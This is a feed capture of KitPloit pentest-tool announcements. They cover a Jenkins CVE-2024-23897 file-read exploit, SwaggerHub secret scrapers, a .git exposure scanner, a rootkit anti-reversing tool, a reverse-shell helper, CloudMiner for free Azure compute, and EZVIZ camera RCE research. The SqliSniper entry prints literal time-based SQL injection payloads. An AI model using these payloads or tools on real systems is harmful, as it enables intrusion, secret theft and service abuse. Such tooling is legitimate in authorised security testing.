FreshRSS

πŸ”’
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayKitPloit - PenTest Tools!

CVE-2024-23897 - Jenkins <= 2.441 & <= LTS 2.426.2 PoC And Scanner

By: Zion3R


Exploitation and scanning tool specifically designed for Jenkins versions <= 2.441 & <= LTS 2.426.2. It leverages CVE-2024-23897 to assess and exploit vulnerabilities in Jenkins instances.


Usage

Ensure you have the necessary permissions to scan and exploit the target systems. Use this tool responsibly and ethically.

python CVE-2024-23897.py -t <target> -p <port> -f <file>

or

python CVE-2024-23897.py -i <input_file> -f <file>

Parameters: - -t or --target: Specify the target IP(s). Supports single IP, IP range, comma-separated list, or CIDR block. - -i or --input-file: Path to input file containing hosts in the format of http://1.2.3.4:8080/ (one per line). - -o or --output-file: Export results to file (optional). - -p or --port: Specify the port number. Default is 8080 (optional). - -f or --file: Specify the file to read on the target system.


Changelog

[27th January 2024] - Feature Request
  • Added scanning/exploiting via input file with hosts (-i INPUT_FILE).
  • Added export to file (-o OUTPUT_FILE).

[26th January 2024] - Initial Release
  • Initial release.

Contributing

Contributions are welcome. Please feel free to fork, modify, and make pull requests or report issues.


Author

Alexander Hagenah - URL - Twitter


Disclaimer

This tool is meant for educational and professional purposes only. Unauthorized scanning and exploiting of systems is illegal and unethical. Always ensure you have explicit permission to test and exploit any systems you target.



swaggerHole - A Python3 Script Searching For Secret On Swaggerhub

By: Zion3R


IntroductionΒ 

This tool is made to automate the process of retrieving secrets in the public APIs on [swaggerHub](https://app.swaggerhub.com/search). This tool is multithreaded and pipe mode is available :)Β 

RequirementsΒ 

Β - python3 (sudo apt install python3) - pip3 (sudo apt install python3-pip) ## Installation
pip3 install swaggerhole
or cloning this repository and running
git clone https://github.com/Liodeus/swaggerHole.git
pip3 install .

Usage

   _____ _      __ ____ _ ____ _ ____ _ ___   _____
/ ___/| | /| / // __ `// __ `// __ `// _ \ / ___/
(__ ) | |/ |/ // /_/ // /_/ // /_/ // __// /
/____/ |__/|__/ \__,_/ \__, / \__, / \___//_/
__ __ __ /____/ /____/
/ / / /____ / /___
/ /_/ // __ \ / // _ \
/ __ // /_/ // // __/
/_/ /_/ \____//_/ \___/

usage: swaggerhole [-h] [-s SEARCH] [-o OUT] [-t THREADS] [-j] [-q] [-du] [-de]

optional arguments:
-h, --help show this help message and exit
-s SEARCH, --search SEARCH
Term to search
-o OUT, --out OUT Output directory
-t THREADS, --threads THREADS
Threads number (Default 25)
-j, --json Json ouput
-q, --quiet Remove banner
-du, --deactivate_url
Deactivate the URL filtering
-de, --deactivate_email
Deactivate the email filtering

Search for secret about a domain

swaggerHole -s test.com

echo test.com | swaggerHole

Search for secret about a domain and output to json

swaggerHole -s test.com --json

echo test.com | swaggerHole --json

Search for secret about a domain and do it fast :)

swaggerHole -s test.com -t 100

echo test.com | swaggerHole -t 100

Output explanation

Normal output

Β `Finding_Type - Finding - [Swagger_Name][Date_Last_Update][Line:Number]`Β 

Json output

Β `{"Finding_Type": Finding, "File": File_path, "Date": Date_Last_Update, "Line": Number}`Β 

Deactivate url/emailΒ 

Using -du or -de remove the filtering done by the tool. There is more false positive with those options.Β 

RepoReaper - An Automated Tool Crafted To Meticulously Scan And Identify Exposed .Git Repositories Within Specified Domains And Their Subdomains

By: Zion3R


RepoReaper is a precision tool designed to automate the identification of exposed .git repositories across a list of domains and subdomains. By processing a user-provided text file with domain names, RepoReaper systematically checks each for publicly accessible .git files. This enables rapid assessment and protection against information leaks, making RepoReaper an essential resource for security teams and web developers.


Features
  • Automated scanning of domains and subdomains for exposed .git repositories.
  • Streamlines the detection of sensitive data exposures.
  • User-friendly command-line interface.
  • Ideal for security audits and Bug Bounty.

Installation

Clone the repository and install the required dependencies:

git clone https://github.com/YourUsername/RepoReaper.git
cd RepoReaper
pip install -r requirements.txt
chmod +x RepoReaper.py

Usage

RepoReaper is executed from the command line and will prompt for the path to a file containing a list of domains or subdomains to be scanned.

To start RepoReaper, simply run:

./RepoReaper.py
or
python3 RepoReaper.py

Upon execution, RepoReaper will ask for the path to the file containing the domains or subdomains: Enter the path of the file containing domains

Provide the path to your text file when prompted. The file should contain one domain or subdomain per line, like so:

example.com
subdomain.example.com
anotherdomain.com

RepoReaper will then proceed to scan the provided domains or subdomains for exposed .git repositories and report its findings.Β 


Disclaimer

This tool is intended for educational purposes and security research only. The user assumes all responsibility for any damages or misuse resulting from its use.



SploitScan - A Sophisticated Cybersecurity Utility Designed To Provide Detailed Information On Vulnerabilities And Associated Proof-Of-Concept (PoC) Exploits

By: Zion3R


SploitScan is a powerful and user-friendly tool designed to streamline the process of identifying exploits for known vulnerabilities and their respective exploitation probability. Empowering cybersecurity professionals with the capability to swiftly identify and apply known and test exploits. It's particularly valuable for professionals seeking to enhance their security measures or develop robust detection strategies against emerging threats.


Features
  • CVE Information Retrieval: Fetches CVE details from the National Vulnerability Database.
  • EPSS Integration: Includes Exploit Prediction Scoring System (EPSS) data, offering a probability score for the likelihood of CVE exploitation, aiding in prioritization.
  • PoC Exploits Aggregation: Gathers publicly available PoC exploits, enhancing the understanding of vulnerabilities.
  • CISA KEV: Shows if the CVE has been listed in the Known Exploited Vulnerabilities (KEV) of CISA.
  • Patching Priority System: Evaluates and assigns a priority rating for patching based on various factors including public exploits availability.
  • Multi-CVE Support and Export Options: Supports multiple CVEs in a single run and allows exporting the results to JSON and CSV formats.
  • User-Friendly Interface: Easy to use, providing clear and concise information.
  • Comprehensive Security Tool: Ideal for quick security assessments and staying informed about recent vulnerabilities.

Usage

Regular:

python sploitscan.py CVE-YYYY-NNNNN

Enter one or more CVE IDs to fetch data. Separate multiple CVE IDs with spaces.

python sploitscan.py CVE-YYYY-NNNNN CVE-YYYY-NNNNN

Optional: Export the results to a JSON or CSV file. Specify the format: 'json' or 'csv'.

python sploitscan.py CVE-YYYY-NNNNN -e JSON

Patching Prioritization System

The Patching Prioritization System in SploitScan provides a strategic approach to prioritizing security patches based on the severity and exploitability of vulnerabilities. It's influenced by the model from CVE Prioritizer, with enhancements for handling publicly available exploits. Here's how it works:

  • A+ Priority: Assigned to CVEs listed in CISA's KEV or those with publicly available exploits. This reflects the highest risk and urgency for patching.
  • A to D Priority: Based on a combination of CVSS scores and EPSS probability percentages. The decision matrix is as follows:
  • A: CVSS score >= 6.0 and EPSS score >= 0.2. High severity with a significant probability of exploitation.
  • B: CVSS score >= 6.0 but EPSS score < 0.2. High severity but lower probability of exploitation.
  • C: CVSS score < 6.0 and EPSS score >= 0.2. Lower severity but higher probability of exploitation.
  • D: CVSS score < 6.0 and EPSS score < 0.2. Lower severity and lower probability of exploitation.

This system assists users in making informed decisions on which vulnerabilities to patch first, considering both their potential impact and the likelihood of exploitation. Thresholds can be changed to your business needs.


Changelog

[17th February 2024] - Enhancement Update
  • Additional Information: Added further information such as references & vector string
  • Removed: Star count in publicly available exploits

[15th January 2024] - Enhancement Update
  • Multiple CVE Support: Now capable of handling multiple CVE IDs in a single execution.
  • JSON and CSV Export: Added functionality to export results to JSON and CSV files.
  • Enhanced CVE Display: Improved visual differentiation and information layout for each CVE.
  • Patching Priority System: Introduced a priority rating system for patching, influenced by various factors including the availability of public exploits.

[13th January 2024] - Initial Release
  • Initial release of SploitScan.

Contributing

Contributions are welcome. Please feel free to fork, modify, and make pull requests or report issues.


Author

Alexander Hagenah - URL - Twitter


Credits


SpeedyTest - Command-Line Tool For Measuring Internet Speed

By: Zion3R


SpeedyTest is a powerful command-line tool for measuring internet speed. With its advanced features and intuitive interface, it provides accurate and comprehensive speed test results. Whether you're a network administrator, developer, or simply want to monitor your internet connection, SpeedyTest is the perfect tool for the job.


Features
  • Measure download speed, upload speed, and ping latency.
  • Generate detailed reports with graphical representation of speed test results.
  • Save and export test results in various formats (CSV, JSON, etc.).
  • Customize speed test parameters and server selection.
  • Compare speed test results over time to track performance changes.
  • Integrate SpeedyTest into your own applications using the provided API.
  • track your timeline with saved database

Installation
git clone https://github.com/HalilDeniz/SpeedyTest.git

Requirements

Before you can use SpeedyTest, you need to make sure that you have the necessary requirements installed. You can install these requirements by running the following command:

pip install -r requirements.txt

Usage

Run the following command to perform a speed test:

python3 speendytest.py

Visual Output



Output
Receiving data \
Speed test completed!
Speed test time: 20.22 second
Server : Farknet - Konya
IP Address: speedtest.farknet.com.tr:8080
Country : Turkey
City : Konya
Ping : 20.41 ms
Download : 90.12 Mbps
Loading : 20 Mbps







Contributing

Contributions are welcome! To contribute to SpeedyTest, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

Contact

If you have any questions, comments, or suggestions about PrivacyNet, please feel free to contact me:


License

SpeedyTest is released under the MIT License. See LICENSE for details.



SwaggerSpy - Automated OSINT On SwaggerHub

By: Zion3R


SwaggerSpy is a tool designed for automated Open Source Intelligence (OSINT) on SwaggerHub. This project aims to streamline the process of gathering intelligence from APIs documented on SwaggerHub, providing valuable insights for security researchers, developers, and IT professionals.


What is Swagger?

Swagger is an open-source framework that allows developers to design, build, document, and consume RESTful web services. It simplifies API development by providing a standard way to describe REST APIs using a JSON or YAML format. Swagger enables developers to create interactive documentation for their APIs, making it easier for both developers and non-developers to understand and use the API.


About SwaggerHub

SwaggerHub is a collaborative platform for designing, building, and managing APIs using the Swagger framework. It offers a centralized repository for API documentation, version control, and collaboration among team members. SwaggerHub simplifies the API development lifecycle by providing a unified platform for API design and testing.


Why OSINT on SwaggerHub?

Performing OSINT on SwaggerHub is crucial because developers, in their pursuit of efficient API documentation and sharing, may inadvertently expose sensitive information. Here are key reasons why OSINT on SwaggerHub is valuable:

  1. Developer Oversights: Developers might unintentionally include secrets, credentials, or sensitive information in API documentation on SwaggerHub. These oversights can lead to security vulnerabilities and unauthorized access if not identified and addressed promptly.

  2. Security Best Practices: OSINT on SwaggerHub helps enforce security best practices. Identifying and rectifying potential security issues early in the development lifecycle is essential to ensure the confidentiality and integrity of APIs.

  3. Preventing Data Leaks: By systematically scanning SwaggerHub for sensitive information, organizations can proactively prevent data leaks. This is especially crucial in today's interconnected digital landscape where APIs play a vital role in data exchange between services.

  4. Risk Mitigation: Understanding that developers might forget to remove or obfuscate sensitive details in API documentation underscores the importance of continuous OSINT on SwaggerHub. This proactive approach mitigates the risk of unintentional exposure of critical information.

  5. Compliance and Privacy: Many industries have stringent compliance requirements regarding the protection of sensitive data. OSINT on SwaggerHub ensures that APIs adhere to these regulations, promoting a culture of compliance and safeguarding user privacy.

  6. Educational Opportunities: Identifying oversights in SwaggerHub documentation provides educational opportunities for developers. It encourages a security-conscious mindset, fostering a culture of awareness and responsible information handling.

By recognizing that developers can inadvertently expose secrets, OSINT on SwaggerHub becomes an integral part of the overall security strategy, safeguarding against potential threats and promoting a secure API ecosystem.


How SwaggerSpy Works

SwaggerSpy obtains information from SwaggerHub and utilizes regular expressions to inspect API documentation for sensitive information, such as secrets and credentials.


Getting Started

To use SwaggerSpy, follow these steps:

  1. Installation: Clone the SwaggerSpy repository and install the required dependencies.
git clone https://github.com/UndeadSec/SwaggerSpy.git
cd SwaggerSpy
pip install -r requirements.txt
  1. Usage: Run SwaggerSpy with the target search terms (more accurate with domains).
python swaggerspy.py searchterm
  1. Results: SwaggerSpy will generate a report containing OSINT findings, including information about the API, endpoints, and secrets.

Disclaimer

SwaggerSpy is intended for educational and research purposes only. Users are responsible for ensuring that their use of this tool complies with applicable laws and regulations.


Contribution

Contributions to SwaggerSpy are welcome! Feel free to submit issues, feature requests, or pull requests to help improve this tool.


About the Author

SwaggerSpy is developed and maintained by Alisson Moretto (UndeadSec)

I'm a passionate cyber threat intelligence pro who loves sharing insights and crafting cybersecurity tools.


TODO

Regular Expressions Enhancement
  • [ ] Review and improve existing regular expressions.
  • [ ] Ensure that regular expressions adhere to best practices.
  • [ ] Check for any potential optimizations in the regex patterns.
  • [ ] Test regular expressions with various input scenarios for accuracy.
  • [ ] Document any complex or non-trivial regex patterns for better understanding.
  • [ ] Explore opportunities to modularize or break down complex patterns.
  • [ ] Verify the regular expressions against the latest specifications or requirements.
  • [ ] Update documentation to reflect any changes made to the regular expressions.

License

SwaggerSpy is licensed under the MIT License. See the LICENSE file for details.


Thanks

Special thanks to @Liodeus for providing project inspiration through swaggerHole.



AzSubEnum - Azure Service Subdomain Enumeration

By: Zion3R


AzSubEnum is a specialized subdomain enumeration tool tailored for Azure services. This tool is designed to meticulously search and identify subdomains associated with various Azure services. Through a combination of techniques and queries, AzSubEnum delves into the Azure domain structure, systematically probing and collecting subdomains related to a diverse range of Azure services.


How it works?

AzSubEnum operates by leveraging DNS resolution techniques and systematic permutation methods to unveil subdomains associated with Azure services such as Azure App Services, Storage Accounts, Azure Databases (including MSSQL, Cosmos DB, and Redis), Key Vaults, CDN, Email, SharePoint, Azure Container Registry, and more. Its functionality extends to comprehensively scanning different Azure service domains to identify associated subdomains.

With this tool, users can conduct thorough subdomain enumeration within Azure environments, aiding security professionals, researchers, and administrators in gaining insights into the expansive landscape of Azure services and their corresponding subdomains.


Why i create this?

During my learning journey on Azure AD exploitation, I discovered that the Azure subdomain tool, Invoke-EnumerateAzureSubDomains from NetSPI, was unable to run on my Debian PowerShell. Consequently, I created a crude implementation of that tool in Python.


Usage
➜  AzSubEnum git:(main) βœ— python3 azsubenum.py --help
usage: azsubenum.py [-h] -b BASE [-v] [-t THREADS] [-p PERMUTATIONS]

Azure Subdomain Enumeration

options:
-h, --help show this help message and exit
-b BASE, --base BASE Base name to use
-v, --verbose Show verbose output
-t THREADS, --threads THREADS
Number of threads for concurrent execution
-p PERMUTATIONS, --permutations PERMUTATIONS
File containing permutations

Basic enumeration:

python3 azsubenum.py -b retailcorp --thread 10

Using permutation wordlists:

python3 azsubenum.py -b retailcorp --thread 10 --permutation permutations.txt

With verbose output:

python3 azsubenum.py -b retailcorp --thread 10 --permutation permutations.txt --verbose




MrHandler - Linux Incident Response Reporting

By: Zion3R

Β 


MR.Handler is a specialized tool designed for responding to security incidents on Linux systems. It connects to target systems via SSH to execute a range of diagnostic commands, gathering crucial information such as network configurations, system logs, user accounts, and running processes. At the end of its operation, the tool compiles all the gathered data into a comprehensive HTML report. This report details both the specifics of the incident response process and the current state of the system, enabling security analysts to more effectively assess and respond to incidents.



π—œπ—‘π—¦π—§π—”π—Ÿπ—Ÿπ—”π—§π—œπ—’π—‘ π—œπ—‘π—¦π—§π—₯π—¨π—–π—§π—œπ—’π—‘π—¦
  $ pip3 install colorama
$ pip3 install paramiko
$ git clone https://github.com/emrekybs/BlueFish.git
$ cd MrHandler
$ chmod +x MrHandler.py
$ python3 MrHandler.py


Report



NullSection - An Anti-Reversing Tool That Applies A Technique That Overwrites The Section Header With Nullbytes

By: Zion3R


NullSection is an Anti-Reversing tool that applies a technique that overwrites the section header with nullbytes.


Install
git clone https://github.com/MatheuZSecurity/NullSection
cd NullSection
gcc nullsection.c -o nullsection
./nullsection

Advantage

When running nullsection on any ELF, it could be .ko rootkit, after that if you use Ghidra/IDA to parse ELF functions, nothing will appear no function to parse in the decompiler for example, even if you run readelf -S / path /to/ elf the following message will appear "There are no sections in this file."

Make good use of the tool!


Note
We are not responsible for any damage caused by this tool, use the tool intelligently and for educational purposes only.


WEB-Wordlist-Generator - Creates Related Wordlists After Scanning Your Web Applications

By: Zion3R


WEB-Wordlist-Generator scans your web applications and creates related wordlists to take preliminary countermeasures against cyber attacks.


Done
  • [x] Scan Static Files.
  • [ ] Scan Metadata Of Public Documents (pdf,doc,xls,ppt,docx,pptx,xlsx etc.)
  • [ ] Create a New Associated Wordlist with the Wordlist Given as a Parameter.

Installation

From Git
git clone https://github.com/OsmanKandemir/web-wordlist-generator.git
cd web-wordlist-generator && pip3 install -r requirements.txt
python3 generator.py -d target-web.com

From Dockerfile

You can run this application on a container after build a Dockerfile.

docker build -t webwordlistgenerator .
docker run webwordlistgenerator -d target-web.com -o

From DockerHub

You can run this application on a container after pulling from DockerHub.

docker pull osmankandemir/webwordlistgenerator:v1.0
docker run osmankandemir/webwordlistgenerator:v1.0 -d target-web.com -o

Usage
-d DOMAINS [DOMAINS], --domains DOMAINS [DOMAINS] Input Multi or Single Targets. --domains target-web1.com target-web2.com
-p PROXY, --proxy PROXY Use HTTP proxy. --proxy 0.0.0.0:8080
-a AGENT, --agent AGENT Use agent. --agent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
-o PRINT, --print PRINT Use Print outputs on terminal screen.



Secbutler - The Perfect Butler For Pentesters, Bug-Bounty Hunters And Security Researchers

By: Zion3R

Essential utilities for pentester, bug-bounty hunters and security researchers

secbutler is a utility tool made for pentesters, bug-bounty hunters and security researchers that contains all the most used and tedious stuff commonly used while performing cybersecurity activities (like installing sec-related tools, retrieving commands for revshells, serving common payloads, obtaining a working proxy, managing wordlists and so forth).

The goal is to obtain a tool that meets the requirements of the community, therefore suggestions and PRs are very welcome!


Features
  • Generate a reverse shell command
  • Obtain proxy
  • Download & deploy common payloads
  • Obtain reverse shell listener command
  • Generate bash install script for common tools
  • Generate bash download script for Wordlists
  • Read common cheatsheets and payloads

Usage
secbutler -h

This will display the help for the tool

                   __          __  __
________ _____/ /_ __ __/ /_/ /__ _____
/ ___/ _ \/ ___/ __ \/ / / / __/ / _ \/ ___/
(__ ) __/ /__/ /_/ / /_/ / /_/ / __/ /
/____/\___/\___/_.___/\__,_/\__/_/\___/_/

v0.1.9 - https://github.com/groundsec/secbutler

Essential utilities for pentester, bug-bounty hunters and security researchers

Usage:
secbutler [flags]
secbutler [command]

Available Commands:
cheatsheet Read common cheatsheets & payloads
help Help about any command
listener Obtain the command to start a reverse shell listener
payloads Obtain and serve common payloads
proxy Obtain a random proxy from FreeProxy
revshell Obtain the command for a reverse shell
tools Generate a install script for the most common cybersecurity tools
version Print the current version
wordlists Generate a download script for the most common wordlists

Flags:
-h, --help help for secbutler

Use "secbutler [command] --help" for more information about a command.



Installation

Run the following command to install the latest version:

go install github.com/groundsec/secbutler@latest

Or you can simply grab an executable from the Releases page.


License

secbutler is made with πŸ–€ by the GroundSec team and released under the MIT LICENSE.



SqliSniper - Advanced Time-based Blind SQL Injection Fuzzer For HTTP Headers

By: Zion3R


SqliSniper is a robust Python tool designed to detect time-based blind SQL injections in HTTP request headers. It enhances the security assessment process by rapidly scanning and identifying potential vulnerabilities using multi-threaded, ensuring speed and efficiency. Unlike other scanners, SqliSniper is designed to eliminates false positives through and send alerts upon detection, with the built-in Discord notification functionality.


Key Features

  • Time-Based Blind SQL Injection Detection: Pinpoints potential SQL injection vulnerabilities in HTTP headers.
  • Multi-Threaded Scanning: Offers faster scanning capabilities through concurrent processing.
  • Discord Notifications: Sends alerts via Discord webhook for detected vulnerabilities.
  • False Positive Checks: Implements response time analysis to differentiate between true positives and false alarms.
  • Custom Payload and Headers Support: Allows users to define custom payloads and headers for targeted scanning.

Installation

git clone https://github.com/danialhalo/SqliSniper.git
cd SqliSniper
chmod +x sqlisniper.py
pip3 install -r requirements.txt

Usage

This will display help for the tool. Here are all the options it supports.

ubuntu:~/sqlisniper$ ./sqlisniper.py -h


β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•— β–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•
β•šβ•β•β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–„β–„ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β•šβ•β•β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β• β–ˆβ–ˆβ•”β•β•β• β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘
β•šβ•β•β•β•β•β•β• β•šβ•β•β–€β–€β•β• β•šβ•β•β•β•β•β•β•β•šβ•β• β•šβ•β•β•β•β•β•β•β•šβ•β• β•šβ•β•β•β•β•šβ•β•β•šβ•β• β•šβ•β•β•β•β•β•β•β•šβ•β• β•šβ•β•

-: By Muhammad Danial :-

usage: sqlisniper.py [-h] [-u URL] [-r URLS_FILE] [-p] [--proxy PROXY] [--payload PA YLOAD] [--single-payload SINGLE_PAYLOAD] [--discord DISCORD] [--headers HEADERS]
[--threads THREADS]

Detect SQL injection by sending malicious queries

options:
-h, --help show this help message and exit
-u URL, --url URL Single URL for the target
-r URLS_FILE, --urls_file URLS_FILE
File containing a list of URLs
-p, --pipeline Read from pipeline
--proxy PROXY Proxy for intercepting requests (e.g., http://127.0.0.1:8080)
--payload PAYLOAD File containing malicious payloads (default is payloads.txt)
--single-payload SINGLE_PAYLOAD
Single payload for testing
--discord DISCORD Discord Webhook URL
--headers HEADERS File containing headers (default is headers.txt)
--threads THREADS Number of threads

Running SqliSniper

Single Url Scan

The url can be provided with -u flag for single site scan

./sqlisniper.py -u http://example.com

File Input

The -r flag allows SqliSniper to read a file containing multiple URLs for simultaneous scanning.

./sqlisniper.py -r url.txt

piping URLs

The SqliSniper can also worked with the pipeline input with -p flag

cat url.txt | ./sqlisniper.py -p

The pipeline feature facilitates seamless integration with other tools. For instance, you can utilize tools like subfinder and httpx, and then pipe their output to SqliSniper for mass scanning.

subfinder -silent -d google.com | sort -u | httpx -silent | ./sqlisniper.py -p

Scanning with custom payloads

By default the SqliSniper use the payloads.txt file. However --payload flag can be used for providing custom payloads file.

./sqlisniper.py -u http://example.com --payload mssql_payloads.txt

While using the custom payloads file, ensure that you substitute the sleep time with %__TIME_OUT__%. SqliSniper dynamically adjusts the sleep time iteratively to mitigate potential false positives. The payloads file should look like this.

ubuntu:~/sqlisniper$ cat payloads.txt 
0\"XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR\"Z
"0"XOR(if(now()=sysdate()%2Csleep(%__TIME_OUT__%)%2C0))XOR"Z"
0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z

Scanning with Single Payloads

If you want to only test with the single payload --single-payload flag can be used. Make sure to replace the sleep time with %__TIME_OUT__%

./sqlisniper.py -r url.txt --single-payload "0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z"

Scanning Custom Header

Headers are saved in the file headers.txt for scanning custom header save the custom HTTP Request Header in headers.txt file.

ubuntu:~/sqlisniper$ cat headers.txt 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
X-Forwarded-For: 127.0.0.1

Sending Discord Alert Notifications

SqliSniper also offers Discord alert notifications, enhancing its functionality by providing real-time alerts through Discord webhooks. This feature proves invaluable during large-scale scans, allowing prompt notifications upon detection.

./sqlisniper.py -r url.txt --discord <web_hookurl>

Multi-Threading

Threads can be defined with --threads flag

 ./sqlisniper.py -r url.txt --threads 10

Note: It is crucial to consider that employing a higher number of threads might lead to potential false positives or overlooking valid issues. Due to the nature of time-based SQL injection it is recommended to use lower thread for more accurate detection.


SqliSniper is made inΒ  pythonΒ with lots of <3 by @Muhammad Danial.



CloudMiner - Execute Code Using Azure Automation Service Without Getting Charged

By: Zion3R


Execute code within Azure Automation service without getting charged

Description

CloudMiner is a tool designed to get free computing power within Azure Automation service. The tool utilizes the upload module/package flow to execute code which is totally free to use. This tool is intended for educational and research purposes only and should be used responsibly and with proper authorization.

  • This flow was reported to Microsoft on 3/23 which decided to not change the service behavior as it's considered as "by design". As for 3/9/23, this tool can still be used without getting charged.

  • Each execution is limited to 3 hours


Requirements

  1. Python 3.8+ with the libraries mentioned in the file requirements.txt
  2. Configured Azure CLI - https://learn.microsoft.com/en-us/cli/azure/install-azure-cli
    • Account must be logged in before using this tool

Installation

pip install .

Usage

usage: cloud_miner.py [-h] --path PATH --id ID -c COUNT [-t TOKEN] [-r REQUIREMENTS] [-v]

CloudMiner - Free computing power in Azure Automation Service

optional arguments:
-h, --help show this help message and exit
--path PATH the script path (Powershell or Python)
--id ID id of the Automation Account - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Automation/a
utomationAccounts/{automationAccountName}
-c COUNT, --count COUNT
number of executions
-t TOKEN, --token TOKEN
Azure access token (optional). If not provided, token will be retrieved using the Azure CLI
-r REQUIREMENTS, --requirements REQUIREMENTS
Path to requirements file to be installed and use by the script (relevant to Python scripts only)
-v, --verbose Enable verbose mode

Example usage

Python

Powershell

License

CloudMiner is released under the BSD 3-Clause License. Feel free to modify and distribute this tool responsibly, while adhering to the license terms.

Author - Ariel Gamrian



SADProtocol goes to Hollywood

By: Zion3R

Faraday’s researchers Javier Aguinaga and Octavio Gianatiempo have investigated on IP cameras and two high severity vulnerabilities.


This research project began when Aguinaga's wife, a former Research leader at Faraday Security, informed him that their IP camera had stopped working. Although Javier was initially asked to fix it, being a security researcher, opted for a more unconventional approach to tackle the problem. He brought the camera to their office and discussed the issue with Gianatiempo, another security researcher at Faraday. The situation quickly escalated from some light reverse engineering to a full-fledged vulnerability research project, which ended with two high-severity bugs and an exploitation strategy worthy of the big screen.


They uncovered two LAN remote code execution vulnerabilities in EZVIZ’s implementation of Hikvision’s Search Active Devices Protocol (SADP) and SDK server:

  • CVE-2023-34551: EZVIZ’s implementation of Hikvision’s SDK server post-auth stack buffer overflows (CVSS3 8.0 - HIGH)
  • CVE-2023-34552: EZVIZ’s implementation of Hikvision’s SADP packet parser pre-auth stack buffer overflows (CVSS3 8.8 - HIGH)

The affected code is present in several EZVIZ products, which include but are not limited to:


Product Model Affected Versions
CS-C6N-B0-1G2WF Versions below V5.3.0 build 230215
CS-C6N-R101-1G2WF Versions below V5.3.0 build 230215
CS-CV310-A0-1B2WFR Versions below V5.3.0 build 230221
CS-CV310-A0-1C2WFR-C Versions below V5.3.2 build 230221
CS-C6N-A0-1C2WFR-MUL Versions below V5.3.2 build 230218
CS-CV310-A0-3C2WFRL-1080p Versions below V5.2.7 build 230302
CS-CV310-A0-1C2WFR Wifi IP66 2.8mm 1080p Versions below V5.3.2 build 230214
CS-CV248-A0-32WMFR Versions below V5.2.3 build 230217
EZVIZ LC1C Versions below V5.3.4 build 230214


These vulnerabilities affect IP cameras and can be used to execute code remotely, so they drew inspiration from the movies and decided to recreate an attack often seen in heist films. The hacker in the group is responsible for hijacking the cameras and modifying the feed to avoid detection. Take, for example, this famous scene from Ocean’s Eleven:



Exploiting either of these vulnerabilities, Javier and Octavio served a victim an arbitrary video stream by tunneling their connection with the camera into an attacker-controlled server while leaving all other camera features operational. A deep detailed dive into the whole research process, can be found in these slides and code. It covers firmware analysis, vulnerability discovery, building a toolchain to compile a debugger for the target, developing an exploit capable of bypassing ASLR. Plus, all the details about the Hollywood-style post-exploitation, including tracing, in memory code patching and manipulating the execution of the binary that implements most of the camera features.



This research shows that memory corruption vulnerabilities still abound on embedded and IoT devices, even on products marketed for security applications like IP cameras. Memory corruption vulnerabilities can be detected by static analysis, and implementing secure development practices can reduce their occurrence. These approaches are standard in other industries, evidencing that security is not a priority for embedded and IoT device manufacturers, even when developing security-related products. By filling the gap between IoT hacking and the big screen, this research questions the integrity of video surveillance systems and hopes to raise awareness about the security risks posed by these kinds of devices.



BounceBack - Stealth Redirector For Your Red Team Operation Security

By: Zion3R


